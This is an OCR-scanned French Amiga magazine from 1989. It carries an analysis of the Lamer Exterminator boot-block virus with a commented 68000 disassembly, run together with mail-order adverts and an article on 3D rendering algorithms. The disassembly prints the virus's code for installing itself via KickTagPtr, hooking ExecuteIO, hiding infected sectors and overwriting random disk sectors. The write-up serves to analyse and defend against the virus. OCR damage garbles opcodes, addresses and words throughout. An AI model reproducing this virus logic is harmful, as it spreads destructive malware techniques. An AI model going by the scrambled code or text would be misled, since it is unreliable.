LAMER: TRANSPARENT ET VISCERALEMENT MECHANT Les commentaires de Cédric Je n'ai pu résister au pathétique appel lancé par Pierre Ardichvili et je me suis dont attaqué au désassemblage du virus Lamer Ex- terminator. Je pensais avoir tout vu en matière de virus mais force m'a été de constater que j’avais sous- estimé la puissance imaginatrice de ces vandales abrutis qui consacrent leur temps à rendre la vie impossible aux utilisateurs innocents. J’ai quelques remarques à ajouter à celles déjà faites par Pierre.
Le Lamer se distingue des autres virus par bien des côtés, que je vous décris ci- dessous:
- Tout d’abord, c'est le premier virus transparent à
l’utilisateur. Il ne se signale à aucun moment, et seule une
personne suspicieuse qui se demanderait pourquoi ses disquettes
se mettent à faire des Rcad Writc Errors aussi souvent et qui
aurait la curiosité d’aller jeter un coup d'ocil sur le
secteur incriminé pourrait découvrir à la lecture de
LAMERÎLAMER!... qu'un virus est passé par là. A noter que ces
Read Write Errors ne sont que logiciellcs, c'est-à-dire que
n’importe quel éditeur de secteur est capable de rajuster le
check- sum; bien entendu, cela ne rappellera pas l’état
antérieur du bloc qui est définitivement perdu. Maigre
consolation, en vérité.
- Il est également le premier virus à être viscéralement méchant.
Les autres se contentaient d'écraser le bootblock (ce qui
n'était pas sans avoir des conséquences graves sur certaines
sortes de logiciels, mais le cas restait quand même rare) et de
se signaler de façon plus ou moins humoristique après une
phase d’incubation, le temps qu'il ait eu le temps de se
propager. Le Lamer, lui, va directement écrire à un endroit
aléatoire sur la disquette. Pas besoin de décrire les
conséquences que cela peut avoir.
- Il inaugure une nouvelle façon de résister au boot, malgré tout
détectable à la vérification des pointeurs CoolCapture,
ColdCapture et KickTagPtr. Autre détail intéressant: la
structure résidente qu’il insère ne voit jamais son premier mot
(appelé MatchWord) initialisé à la valeur S4AFC, ce qui est
en théorie indispensable pour que le système la reconnaisse
en tant que telle lors du reboot. Ce mot est-il donc superflu?
Je ne m’étendrai pas davantage sur ce sujet.
Voir désassemblage page suivante
- En fait, il est inexact de dire qu'il choisit de détruire un
secteur sur une disquette au hasard. Cette disquette doit
tout d'abord être de format DOS (charmante attention! Seuls les
Amiga sont visés) et le secteur doit être de type Data, sans
quoi, il n'intéresse pas le virus. La remarque de Steve Tibbett
précisant que les block FFS ne risquent rien est donc
justifiée, mais dans la version actuelle du système
d’exploitation, le FFS ne fonctionne pas sur les disquettes.
- Le Lamer bat tous les records en matière de protection.
L'auteur a dû consacrer la moitié de son temps de réflexion à
imaginer des moyens tordus pour ne pas alerter les utilisateurs
trop curieux et les anti-virus. Les voici en vrac:
• Tout d’abord, la partie vitale du code du virus est codée par
une clé qui est à chaque fois modifiée. Il s’agit de simples
opérations logiques qui rendent inutiles les utilitaires du
genre ViewBoot et autres Guardians. A moins de savoir
précisément où regarder (c'est ce que fait VirusX 3.2, cf.
L’article de Pierre), on ne peut y déceler de manière évidente
un virus.
• Ensuite, il ne se charge jamais au même endroit en mémoire
(faiblesse qu'avaient les SCA et autres BytcBandit).
Celui-ci dépend directement de la limite inférieure de la pile Superviseur, et un offset aléatoire est à nouveau calculé pour établir l’endroit définitif d'installation.
• Il ne détourne pas le point d'entrée de DoIO (une des premières
choses vérifiées par les anti-virus) mais un de scs obscurs
fils, le champ pointant sur Exe- cutcIO, déduit à partir de la
structure Node correspondant au trackdisk.device. Ceci le
contraint à rajouter une routine pour ne pas bloquer l'aspect
multi-tâches de DoIO, et il a donc directement piqué en ROM les
outils pour construire cette routine. Je ne m’étendrai pas non
plus sur cet aspect technique.
• Si jamais le virus est installé en mémoire, vous n’aurez jamais
la possibilité de le lire sur une disquette. Je m'explique:
si vous exprimez une commande Read, avant de vous livrer le
résultat de la lecture, le Lamer vérifie qu’il ne s'agit pas
d’un secteur qu’il a infecté. De deux choses l’une: si vous
avez demandé à visualiser un bootblock, il vous montre un
bootblock DOS standard, et sinon, un bloc rempli de zéros.
C’est diabolique!!!
Voilà, je crois avoir fait le tour de la question. N’oubliez pas que le moyen le plus sûr d’éviter la contagion est encore de déprotéger vos disquettes le moins possible (seulement quand il le faut) et d'avoir VirusX 3.2 qui veille dans un coin de votre Workbcnch.
Cédric BEUST dit "le Lymphocyte" CHOUEUE INFORMATIQUE Boîlc Postale 42 67340 INGWILLFR Tél.: 88 895 241 Joyeux Noël et Bonne Année MiniMAX Nus La carte intelligente!
V ou wë tr MTŒToiïî quïpé d'un FAT AGNUS..... Offre No 1 Une carte MiniMAX Plus (extensible à 2 MO) avec Clock, équipée de 1MO + la ROM Kickstart 1.3 + le BIG FAT AGNUS, le tout à un prix chouette de: 2 4 9 9 Frs +Pon Vous disposerez d' 1 MO de CHEP RAM et de SmÇO e ASTRANL Suger Vous avez un Amiga 500 disposant déjà du BIG FAT AGNUS et du Kickstart 1.3 ..... Offre No 2 Une carte MiniMAX Plus (extensible à 2 MO) avec Clock, équipée de 1.5 MO , à un prix Chouette de: 2 4 9 9 Frs + Pon Vous disposerez d' 1 MO de CHIP RAM et d’ 1 MO de FAST RAM! Bien?
Vous n'avez pas beaucoup d'argent mais désirez étendre la mémoire de votre Amiga 500 à 1 MO .... Offre No 3 Une carte non-extensible de 512 KO avec Clock, à un prix Chouette de: 7 9 9 Frs +Port Vous disposerez d-1 MO de RAM pour les jeux, le dessin! Chouette pas vrai?_ Vous avez un Amiga 2000 .. Offre No 4 Une carte-mémoire de 2 MO extensible à 8 MO pour: 345 8 Frs + Port N'écoulez pas les corbeaux... nos produits sont chouette En plus, pour chaque commande, nous remboursons ce journal si ou tou envo er sor od tarre Bon de commande à renvoyer ou à recopier
Nom ......Prénom Age Adresse .. ..CP Ville ... exemplaire(s) de l’offre n .. Prix total Frs Date O Chèque joint (pas de frais de port) encaissement après délai légal O Contre remboursement - frais de port et contre-remboursement en sus Signature obligatoire (du représentant légal pour les mineurs) .... Je dispose de 7 jours pour résilier ma commande ( lettre recommandée en AR) Signature obligatoire (du représentant légal
pour les mineurs) .... ü- Désassemblage du virus Lamer Exterminât or par Cédric Beust Réserve une zone de mémoire en dessous de la limite intérieure de la pile 03004e: move.l SysStkLower(A6),A1 030052:moveq «S00.D0 030054: move.b 5011007,00; Nombre aléatoire pour 03005a: muls *S0012.D0;changerâ chaque fois 03005e: bdr «0,00 030062: adda.w D0.A1 ; At pointe sur mémoire SI l'un des trois pointeurs est libre ou occupé par quelqu'un d'autre, je m'installe 030064: move.l KidcTagPtr(A6|.D0 030068: bne.s 5030076 03006a: move.l CoolCapture(A6).DO 03006e: bne.s 5030076 030070:
move.l ColdCaptixe(A6),D0 030074: beq.s 5030096 030076: move.l Al.Dl; L’un des trois est occupé 030078: swap D0 03007a: swap D1 03007c: cmp.w OO.Dl ; Est-ce par moi?
03007e: bne.s 5030096; Non, je m'insldle 030080: swap D0 030082: move.l D0.A1 ; Qji. Mais 030084: andi.w «51100,D0; on alterne l'endroit 030088: ctrpl.w «StSOO.DO; où s'installer pour ne 03008c: bcs.s 5030092; pas êée détecté par 03008e: suba.w «SOcOO,A1 ; un ami-virus 030092: addaw «50400,At 030096: lea -152(PC)(=S30000) ,A0 03009a: pea 170(At);Ëmpie l'adresse où conènuet (S300aa) 03009e: move.w »S03a7,00; Je me recopie 0300a2: move.b (A0)*.(A1)« 0300a4: dbt D0.S0300a2 0300a8: rts ; at je saute en 170(A1) = S300aa 0300aa: bsr.s S0300be; Va assurer ta pérenniiô 0300ac: lea 774(PC)(=S303b4),A0
030060: move.w «50203,(AO); Rétablit le corrweur 0300b4: movem.l (A7)*.A6-A0 D7-D0 0300b8: lea - 148 PC)(=S30026).A1 0300bc: rts ;el reprend le cours normal ;- Routine qui inrtialise KickTagPtz atin d'assurer la survie du virus en cas de reboot 030Obe: move.l KickTagPtr(A6),D0 0300C2: beq.s S0300c8; Encore aucune table résidente 0300c4: bset «31,DO; Si bit 31 tris, indique l'existence 0300c8: lea 750(PC)(=5303b8),AO ; d'autres taries résidentes 0300cc: lea 8 A0).A1 ; At - S303c0 (struct Residem) 0300d0: move.l A1,(A0); Stocke son adresse en 5303b8 0300d2: move.l DO,4(AW; Adresse des autres
labiés résidemes 0300d6: move.l A0,KicklagPtr(A6) ;- Initialisation des champs do la structure résidente Rem; aucune allusion au MatchWord Mate 030Oda: move.l «$ 012!0Otl,1O(A1) ; Flags. Ver, Type e! Pli 0300e2: lea 674(PC) =S30386),A0 ; Name 03OOe6: move.l A0,14(A1) 0300ea: lea 86(PC)(=S30142),A0 ; Init 0300ee: move.l A0.22IA1) 030012: jsr KickSumDala(A6); Valide le tout 0300(6: move.l D0,KickCheckSum(A6) lea 684(PC)(=5303a8),A0 ; Sauvegarde KickSumData» move.l -610(A6},(AO) 03001a: 03001e: 030102: 030106: 03010a: 030110: 030116: 03011a: 03011e: 030120: 030124: 030128: 03012c: 03012e 030132:
030136: 03013a: 03013e: lea 78(PC)(=S3O152).A0 ; El se mel â sa place move.l A0,-610(A6) move.l «500000400.DO move.l «S00010002.D1 |sr AllocMem(A6); Alloue de la mémoire lea 660(PC)(=$ 303b0).A0 moveJ D0,(A0) lea OevlceLisl(A6).A0 lea 590(PC)(=S30374),A1 ;A1 - trackdisk.device- |sr FindName(A6) move l DO,AO; Obtient le node du device lea 636 PC)(=$ 303ac),A1 move.l -28(A0).(A1); puis sa rouéne ExecutelO lea 68(PC)(=53017c),A1 ;â laquelle on se substitue move.l A1,-28(A0) jmp RndTask(A6)
- Routine d'initialisation de la table résidente, appelée lors de
chaque reboot. Au bout de 3, le virus entre en action (sinon,
on ne touche pas à ExecutelO) 030142: lea 624(PC)(=S3O3b4).A0
030146: tstb (AO); Compteur nul?
030148: beq.s 5030150; Oui. Démarre le virus 03014a: subq.b «1 ,(A0); Non, le décrémente puis reêre 03014c: jsr RemTask(A6); la lâche qui sera remise plus lard 030150:bra.s S0300fa : Nouvelle routine KickSumDataO 030152: lea 612(PC)(=S303b8),A0 030156: move.l KidcTagPtr(A6).D0; Pas de résident 03015a: beq.s S03016e; La souci résideme est-elle la mienne?
03015c: cmpa.l DO.AO 03015e: beq.s 5030176; Oui, exôcuton normale de KickSumData 030160: move.l A1,-(A7) 030162: move.l D0.A1 030164: dr.l 4(A1) 030168: move.l (A'7).,A1 03016a: bsel «31,00 03016e: move.l D0,4(A0) 030172: move.l A0.KickTagPtr(A6) 030176: move.l 560(PC)(=S303a8).-(A7) ; Appelle l'ancien KickSum- Daia 03017a: rts :- Routine qui a pris la place de ExecutelO 03017c: cmp.l «S200.io_Length(A1) ; Longueur = 512 octets?
030184 : beq I 503021e; Qji. C'esl peut-être pour le booiMock 030188: tst.l io_Oltset(A1 ); L'ollsel est-il égal â 0 03018c: bne.l SÔ30356; Non, on no lait rien 030190: cmpi.b «CMD WRITE,io Command(AI) 030196: beq.s S0301a2 030198: cmp.b «CMD READ.io Command(Al) 03019e: bne.l S030356; NI READ, ni WRITE: exécution normale WRITE ou READ demandé 0301 a2: movem.l A3-A1 D2-D1,-(A7) 0301 a6: lea 526(PC)(=S303b6).A0; Sauvegarde le champ Flaqs 030laa: move.b io_Flags(A1),(A0) 0301 ae: bsr.l S030326; ExecutelO 030lb2:cmpb «CMD WRITE,io Command(A1) ; les autres tâches 0301b8: beq.s 503020c ;- READ
demandé 0301ba: move.l io Data(A1),A0 0301b»: move.l (A0)t,D0 0301C0: cmp.l -450(PC)(=S30000).DO ; Disquette DOS?
0301c4: bne.l 50302(8; Non, on n'insiste pas 0301 c8: move.w 66(A0).D0; C'est un Irôrot?
0301 cc: cmp.w -392(PC)(=530046),DO " 0301(30: bne.s 50301(2; Non 0301(32: move.l «Sc0200l19,(AO)r; Oui, taiteroire que le bootriock 0301d8: move.l «S43la0018,4(A0); est DOS standard!!!
0301e0: move.l io Length(A1).D0 0301e4: sutx.w «S0033.DO 0301e8:adda.w «5002a,AO 9301ec; dr.b (A0)t; Etlace le reste des data 0301 ee : dbt D0.S0301 ec; Et moitra pus lard le complément 030112: empi! «S00000400.io_Lengih(A1) 03011a: beq I S030218; Est-seulement une lecture de 1024 octets?
03011e: nwve.l io Unit(Al),A0 030202: bisl «4,64(AO);ou drive indisponirie?
030208: bne.l 5030218; On ne tait rien 03020c: moveq «500,00; Sauvegarde la struct loStdRoq 03020e: bsr.l SÛ3035C Partie méchante du virus: en premier lieu, se récrit sur le bootblock de la malheureuse disquette présente 030212: move.b «CMD WRITE.io_Command(Al) 030218: move.l «SOOOOMOO.io Length(A1) 030220: move.l 398(PC)(=S303b0),A2 030224: move.l A2,io Daia(A1) 030228: lea 375(PC)(=S303a1),A0 03022c: move.b Sdtl007,D0; Octet aléatoire non nul 030232: beq S 503022c 030234: move.b DO.(AO)t 030236; addql »1,(A0) 030238: loa -570(PC)(=S30000),AO 03023c: addq.b 1,13(A0); Change la dé de codage
du bootriock 030240: move.b 13(A0),D1; Récupéré celte nouvelle dé 030244 move.w «S03a7,D2 030248 move.b (A0)t.(A2).;Recope le bootriock 03024a:dbt D2,5030248 03024e: move.l 352(PC)(=S303b0),A0 030252: move.l A0.A2 030254 : adda w «S004e.A0; El code la parte S4e - S3ee 030258: adda w »S03a1 ,A2; (le corps du Lamer!)
03025c: eor.b D1,(A0) 03025e subb D0,(A0).
030260 empa I A0.A2; Boude tant que ce n'est pas fini 030262. Bne.s S03025C 030264; move.w SSOOH.DO; Calcde le checksum du nouveau 030268: moveq «500.01; bootriock 03026a: move.l 324(PC)(=5303b0),A0 03026e: move.l A0.A2 030270: add I (A0).,D1 030272: bcc.s S030276 030274: addql «1.D1 030276: dbl D0.S030270 03027a: not.l D1 03027c: add.l 4(A2),Dl 030280: bcc.s SO30284 030282: addq l St.Dl 030284: move.l D1,4(A2); Stocke ce checksum 030288: bsr.l 5030326; Et ExecutelO 03028c: lea 294(PC)(=$ 303b4),A0 030290: tstb 1(A0); Compteur de rebaol (unités) nul?
030294: beq.s 503029a; Oui, ça va taire mal!
030296: subq.b «1,1 (AO); Non, on le décrémente 03029a: tsLw (AO); Compteur général nul?
03029c; bne.s 5030214; Non. ça ira pour cette Iris et en deuxième lieu, choisit un secteur au hasard et le remplit de LAMER!
03029e: move.w «50203,(AO): Resétuo le compteur 0302a2: move.b »CMD READ,29(A1) 0302a8: move.l «500000200.IO Length(A1) 0302D0: move.l 254(PC)(=S303bO),lo Data(A1) 0302b6: move.w Sdtt006,D0 0302bc: dvs «50026,DO 0302cO: muls «S0200.DO 0302c4; move.1 DO,io_Ottsel(A1); Secteur au hasard 0302c8: bsr.s 5030326; Lecture de ce secteur 0302ca: move.l 228(PC)(=S303b0).A0 0302ce: cmp.b «S08.3(A0); Est-il de type DATA?
0302d4 : bne.s S0302I4 ; Non, on laisse tomber 0302d6: move.w «S0054.00 0302da: move.l «S4c616d65,(A0U; = "LAME" 0302e0: move.w «S7221,(A0)t; = "Rf 0302e4: dbt D0,S0302da,Et ce, 511e trisl 0302e8: move.w «52121 ,(A0); Complète avec deux T 0302ec: move.b «CMD WRITE,io Command(AI) 030212: bsr.s S030326; Et récrit ce secteur 030214: moveq «SOI,DO; Rappelle strucl loStdRoq originelle 030216: bsr.s S03035C; Et va l'exéculer 030218: movem I (A7)*.A3-A1 D2-D1 0302tc: rts Longueur des data = 512 octets 0302!e: cmpi.b «CMD._READ,lo_Command(A1) 030304 : bne.s 5030356; Ut le secteur demandé 030306: bsr.s
503032c; Fait le ménage, mais avec une stud 030308: move.l io. Data(A1),A0 ; lOStdReq (et non Node, cette Iris) 03030c: move.w 422(AO).DO; Le secteur est-il inlecté (422=S1a6)?
030310: cmp.w 148(PC)(=53O3a6).D0 030314: bne.s 5030324; Non, rien â cacher 030316: move.w «S01H.DO;Oui, on tait croire à l'utilisateur 03031a: move.l io_Data(A1),A0 03031e:dr.b (AO)* ; qu'il est vide 030320: dbt D0.S03031e 030324: ris Routine trop complexe i expliquer en détails Ici Indispensable pour ne pas bloquer les autres tâches qui ont également exprimé des requêtes IO.
Cette routine est directement inspirée de la fonction Doio de la ROM. Pour plus de détails, se reporter é "La Bible de l’Amiga" p401 ou au RKM - Exec 030326: movem.l 4(A7).A3-A1 D2-D1 03032c: movem IA6’A1,-(A7) 030330: bsr.s S030356 030332: move.l (A?).A1 030334: move.l 50004,A6 030338: move.b 124(PC)(=5303b6).D0 03033c: bne.s 503034c; C'est une struct lOStdReq 03033e: cmpi.b SS07,8(A1); Attend un REPLV MSG 030344 : bne.s 503033e; (c'est une struct Node) 030346: jsr Renx)ve(A6) 03034a: bra s S030350 03034c: jsr WanlO(A6) 030350: movem I (A7)t,A6JA1 030354: rts Exécution normale de ExecutelO
030356: move.l 84(PC)(=S303ac).-(A7) 03035a: rts ;- Transtére les champs Command, Flags, Error, Actual, Length Data et Offset de la struct loStdReq I- 1 de S303da vers la struct lOstdReq si DO 0
* l'inverse si dO = 0 03035c: lea 28(A1),A0 030360: lea
!20(PC)(=5303da).A2 030364: ISI.I DO 030366: beq.s S03036a
030368: exg A0.A2 03036a:moveq «504,00 03036c: mover(A0)..(A2),
03036e: dbt 00.503036c 030372: rts 030374 : dc.bTrackdisk.devi
ce', 0,0 030386: dc.bThe LAMER Exterminator !!!¦* 0303a0:dc.b
531 0303al :dc bSbt; Octet aléatoire 0303a2: dc.lSfO, Compteur
incrêmenlé 0303a6:dc.wSabcd; (Art d’idenlitication du virus
0303a8: dc.iO; Sauvegarde de l'adresse de l'ancienne ; - rouéne
KickSumData (devient 530152) 0303ac: de IO; Adresse de
ExeculelO 0303W): dc.lO; Primeur sur zone de mémoire allouée
0303b4 : dc.wS203; Compteur décrémenté avant les ravages
0303b6;dc.w0; Sauvegarde de io_Flags 0303b8; dc.lO; Primeur sur
structure résidente (5303c0) 0303bc:dc.l0; Adresse des
éventuels autres résidents 03030) - 0303da; Table résidente
0303da - 0303ee; Cope d'une panie de la struct lOSldReq
- C.C.M.- "Cash & Carry Micro" 37, rue des Mathurins 75008 PARIS
- BT(l) 40 16 04 02 Tous nos Prix sont TTC POUR AMIGA 500 & 2000
LECTEUR 5" 1 4 1380 Frs Les Périphériques de L’amiga 500 10021
Moniteur couleur HR 2550 10008 Extension 512K + Horloge 1290
10012 Disque dur 20 MEGS 4890 10007 Prise Péritel 150 10017
Extension Spirit 0K 1600 RAM POUR A590 (UNIQUEMENT Par Kit de
512K 705 FRS ttc code R590 BUREAU INFORMATIQUE Bois Gouleurur
Métal peut être repeint 1-niveau Clavier, 1 Niveau Moniteur 2
étagères latérales rétractables _80(1 TTC (en port du)_ Code
PIS POUR AMIGA 2000 EXTENSION 8 M.O. Peuplée 2 M.O. 4890 ttc
NOUVEAUTES HARD ET SOFT NOUS TELEPHONER Périphériques et
accessoires (500 2000) 10005 Lecteur 3 1 2 extra plat 950 10006
Lecteur Standart 1050 10007 Prise Péritel 150 10030 SCANNER A4
N&B 4590 10009 Imprimante 80 col 100 eps 1300 10010 Imprimante
80 col 120 eps 1480 10011 Imprimante couleur 9 aig. 1990 10031
FLICKKR FIXER 4490 10013 Jovstick QS 70 10014 Gd. Marque 3" 1 2
2DD par 10 105 10015 Gd. Marque 3" 1 2 21)1) par 100 920 10016
ECK MIDI 505 10016 Tapis Souris 60 10032 Carte Accélératrice +
2 Meg 12490 10018 DISK 3" 1 2 BULK par 50 395 10019 DISK 3" 1 2
BULK par 100 740 10020 Btes. Posso pour 150 3" 1 2 120 code P18
Note AMIGA 500 AMIGA2000 A590 A2058 Sont des marques déposées
de Commodore Inc. 20065 - PERFECT SOUND 830 Frs 20066 AMAS
(digit& interfacemidi 990 Frs UTILITAIRES 20005 DIGIVIEW GOLD
1650 20006 DELUXE PAINT III 690 20007
B. A.D. 315 20008 ANIMAGIC 700 20009 PROFESSION Al, DRAW 1300
20009 PHO I ON PAINT 2 890 20010 3D DEMON 700 20011 GFA BASIC
650 20012 CLIMATS 250 20012 PROJECT 1) 320 20013 K1NDSWORDS 2
560 20034 DIGIPAINT 3 790 20015 AMAX (avec 12S k de rom) 2990
20016 Pixmate 1.1 415 20017 Fantavision 390 20018 THE D1RECTOR
485 20019 SCULPT 3D XL 1210 20020 SCULPT ANI 4D JUNIOR 995 ? *
* * SPECIAL MICROS * * * * PRIX PREFERENCIELS - FACILITES DE
PAIEMENT 2 OPTIONS
A) Chèque remis à l'encaissement le 15 janvier 1990 I!) Règlement
en 3 chèques : Fin dévembre 89 - 31 .01 90 - 28 02 90 NOUS
CONSULTER POUR PRIX ET ACCORD PROMOS VIDEO Vous avez une
Caméra Vidéo Alors avec Votre AMIGA Titrez, Trucquez, Montez
etc.. Digitalisez. Etc... 40006 PACK DIGIT DG88+Digivie v Gold
(Filtre Electronique et logiciel Digit) 3590 Frs.
40007 PACK PRO GST GOLD + Digiview Gold (Gcnlock. Filtre électronique, Codeur FAI.et logiciel digit) ' Frs.
SUPER SOURIS Très résistante et Bonne Prise en main AVEC TAPIS ET SUPPORT SOURIS HOI R AMIGA 51)11 K l 2(100 309 TTC ADAPTEZ UN PC XT DANS VOTRE AMIGA 2000 PRIX Décembre 3400 FRS JEUX 30026 B ATM AN 250 30026 SHADOW OF BEAST 295 30027 Super Scramble 190 30038 GREAT COURTS 245 30029 FALCON 280 30030 FALCON MISSION 185 30031 VOI.LEY BALL SIM 190 30032 BEACH VOLLEY 205 30028 RICK DANGEROUS 180 30020 S1LK WORM 205 30024 BLOODWYCH 225 30013 SPACE HARRIER 199 30014 SUPER HANGON 240 30015 DRAGON’S LAIR 340 30016 DRAGON NINJA 225 30037 ALTERE!) BEAST 235 30041 NORTH AND SOUTH 225 30023 FI6 COMBAT
PILOT 219 RAM POUR A2058 OU EXTENSION CCMtci dessus.
1395 Frs ttc le MEGA code e2000 CODE DESIGNATION QUANTITE TOTAL REGLEMENT Par chèque Joint. CB ou VISA Frais de port TOTAL A DECOUPER OU RECOPIER (Bien lire les conditions de Ventes) NOM Prénom Adresse Ville Téléphone N“ VISA ÇB Date Expiration CONDITIONS GENERALES DE VENTES . .. ...... Vente UNIQUEMEN T par correspondance. La première commande est passée par courrier .nos ClicnLs reçoivent avec leur première livraison la liMo des services. N de téléphone etc., qui leront d eux des clients privilégies. ATTENTION Frais de port : Les colis de plus dc,5Kg (Micros, périphériques etc..| soni livres
en PORT DU. Pour les autres expéditions AJOUTEZ 35 FRS au montant de votre commande. Nous vous prions de bien respecter ces conditions afin de nous permettre de maintenir nos prix. . , . ... , r. . , . .
GARANTIE : les micros cl périhériuucs sont garantis 1 an pièces et main d'oeuvre. Les logiciels sont échanecs si dctfcctucux dans un délais de 3 semaines après la livraison. Voir nos conditions de Garantie tors de ta livraison. VOS REGLEMENTS NE SONT ENCAISSES QU'APRES EXPEDITION DE LA MARCHANDISE.. Sauf rupture la majorité des commandes sont traitées le jour de réception.
CETTE ANNONCE EST VALABLE LE MOIS DE SA PARUTION ET REMPLACE LES PRECEDENTES.(Anews dec 8-9) par: François BAUD Patrick CONCONI Philippe LOPATKA La m Part. III LE CALCUL DES SURFACES VISIBLES La difficulté consiste à représenter de la manière la plus réaliste possible les éléments de la scène et leur position relative dans l'espace. Chaque objet étant constitué d’un assemblage de facettes élémentaires (polygones pour Videoscape et triangles pour Sculpt), il faut déterminer quelles facettes (ou portions de facettes) sont visibles pour l'observateur. De nombreux algorithmes ont été développés
mais nous allons n'en examiner que trois, ceux des logiciels testes.
L’ALGORITHME DU PEINTRE Un des algorithmes les plus connus utilise la notion de classement des facettes, U suppose qu'il est possible de les classer en leur attribuant leur P°s't,on P®1 rapport à l'observateur. On comment* par la facette la plus éloignée de l'oeil, puis on se rapproche. Une Pi „ rr °" af s.ur ecran faccllE No1 (la plus éloignée) qui donne un dessin de couleur occupant une certaine position de ou la totalité de celle0 ciUUC 2' aUtrC apparaîl' qui peul £lrc lotaleme , séparée de la première ou bien venir recouvrir une partie n . °n cont,nuc lc Processus en dessinant les
facettes par ordre de numéro croissant et lorsqu'elles ont toutes été affichées, l'image finale ne représente que les parues visibles de la scene, les parties cachées ayant été effacées à un moment ou un autre par recouvrement. Ce procédé est connu sous lc nom d'algorithme du peintre.
Cette technique présenté quelques inconvénients car ü est parfois impossible de classer les facettes en fonction de leur distance par rapport à t observateur Les programmes qui utilisent cet algorithme peuvent soit ignorer le problème (c'est le cas de la première version de Videoscape qui génère parfois des images incorrectes). Soit y remédier en subdivisant les facettes critiques. L'examen de ces cas critiques peut aller jusqu'à doubler ou inpicr le temps de calcul de l image.
; , Ve* lmagCS 0* lenues avec cette méthode de calcul ont souvent un aspect très irrégulier et sans vie, U est difficile de leur ajouter des détails réalistes tels que des reflets ou des ombres. L'avantage de cette technique réside dans sa vitesse de dessin très élevée: Videoscape, qui utilise l'algorithme du peintre, peut dessiner un objet de plusieurs centaines de facettes en quelques secondes L’ALGORITHME DU Z-BUFFER . ,Un woeédé consiste à imaginer qu'en chaque point de l'écran (pixel) on trace une droite perpendiculaire à celui-ci et dirigée vers I observateur. Chaque droite rencontre
une ou plusieurs facettes avant d'atteindre le plan où se trouve l'observateur. On calcule alors la distance entre chaque point d intersection avec une facette et l'écran, et on ne conserve que le point le plus proche de l'observateur. En connaissant la facette à la- j . Apparent ce point, on peul en déduire la couleur qui doil eue affectée à chaque pixel de l'écran. L'image complète est obtenue après avoir étu- ic toutes les droiles issues de tous les pixels. Cet algorilhme est connu sous le nom de calcul du Z maximal, ou encore algorithme du Z-buffer.
¦ .,, Dan,S sa nouvclje version, Videoscape 3D utilise cet algorilhme pour obtenir des images plus fines et dans lesquelles les facettes n'ont plus c problème de superposition. La vitesse de calcul est moins élevée qu'avec l'algorithme du peintre mais elle reste plus élevée qu'avec la technique professionnelle8 n°US P'US ‘°‘n' ,;alg0n'hmc du z'b “t le plus utilisé actuellement dans les stations graphiques à vocation L’ILLUSION DE LA RÉALITÉ L Amiga est le seul ordinateur dans sa gamme de prix pouvant afficher assez de couleurs (4096) pour représenter de manière suffisamment résisté une
scene 3D. Le premier pas vers l’illusion de réalité est franchi lorsqu'on tient compte de l'éclairage ambiant, car la couleur de chaque fa- ccuc aepend de sa position et de son inclinaison par rapport à une ou plusieurs sources lumineuses. Ce mode de calcul permet également de tenir compte de la nature de la surface des objets, puisque la lumière n'est pas réfléchie de la même manière par un bloc de marbre ou par de l'aluminium LA GUERRE DES RAYONS Videoscape 3D, DBW-Render et Sculpt 3D sont parmi les meilleurs programmes graphiques jamais conçus pour un micro- oromateur; ils mettent à notre
portée les techniques de création d'images de synthèse utilisées habituellement par des infographistes professionnels, pour la création de génériques de télévision ou d’images publicitaires de choc.
Les images les plus réalistes sont créées par Sculpt 4D et DBW-Render grâce à la méthode du 'Ray Tracing' mais elles demandent des temps de calcul parfois prohibitifs. Par contre, Videoscape 3D permet d'obtenir des images plus simplistes mais dans des temps plus raisonnables.
Chaque programme offre une interlace différente avec l'utilisateur. Sculpt 4D possède un éditeur graphique très puissant et facile à manipuler avec la souris, tandis que DBW-Render est un langage graphique compilé qui n’accepte que des commandes tapées au clavier. Videoscape se situe entre les deux en proposant une série de modules pour la construction et la présentation des objets. Ces modules produisent toujours des fichiers texte pour la description et l’animation des objets (fichiers qui peuvent être introduits directement au clavier).
Les programmes diffèrent également par la méthode de calcul utilisée pour la représentation mathématique des objets. Ils doivent tô- nir compte des couleurs, de l'éclairage ambiant et de beaucoup d'autres facteurs pour aboutir à une représentation réaliste des objets tels qu'ils nous apparaissent dans l'espace.
L'approximation la plus grossière consiste à calculer une seule luminosité par facette, tous les points de celle-ci sont alors éclairés de la même manière et représentés par la même couleur. Dans sa première version, Videoscape 3D traitait les objets de cette manière, ce qui leur donnait un aspect anguleux, loin de la réalité, où le passage de la lumière à l'ombre se fait de manière continue.
Pour améliorer le modèle on affecte une luminosité différente à chaque point d'une même facette. Les temps de calcul sont bien entendu beaucoup plus longs, mais l'image obtenue est plus correcte, les facettes offrant alors des dégrades de couleur qui permettent de mieux apprécier les zones d'ombre et de lumière.
D'autres facteurs interviennent dans le calcul de la couleur qu'il faut affecter à chaque point d'une facette. Pour la transparence par exemple, il faut prendre en compte les indices de réfraction des matériaux et leur degré d'opacité.
Pour obtenir une image très réaliste on peut encore ajouter le traitement des réflexions de lumière (qui interfèrent avec le rayonnement des sources principales d'illumination), ainsi que le calcul des ombres portées (qui viennent recouvrir une partie d'un objet). Les algorithmes de base qui prennent en compte tous ces facteurs utilisent en général la technique dite du Lancer de Rayons ou Ray Tracing.
LERAYTRACING Au lieu d'étudier mathématiquement l'impact de chaque rayon lumineux sur tous les objets d'une scène, il suffit de ne tenir compte que des rayons lumineux qui vont atteindre l'oeil de l’observateur. L'idée de base de cet algorithme consiste à calculer le chemin inverse suivi par un rayon lumineux qui partirai de l'oeil de l’observateur pour aller vers un point de l'écran.
Ce rayon rencontre une ou plusieurs surfaces sur son chemin. Suivant les propriétés de ces surfaces, il est arrêté (surface opaque) ou dévié et affaibli (surface transparente). Il peut être réfléchi dans une seule direction ou dans plusieurs (lumière diffuse). Ainsi, à partir d'un seul rayon de départ (appelé rayon primaire), on peut engendrer plusieurs rayons secondaires qui viendront participer au calcul de la luminosité à affecter à un point de l'écran.
L'image complète est obtenue en traitant tous les rayons primaires passant par tous les pixels de l'écran, ainsi que tous les rayons secondaires qui en sont issus et qui sont dirigés vers chaque source lumineuse. Ces algorithmes sont les plus gourmands en temps de calcul (qui dépend du nombre de pixels de l'image). Pour chaque pixel de l'écran il faut tracer au moins un rayon principal ainsi qu'un rayon supplémentaire pour chaque source de lumière, ce qui totalise 128.000 rayons pour une simple image avec une seule source de lumière et en basse résolution (320 x 200 pixels).
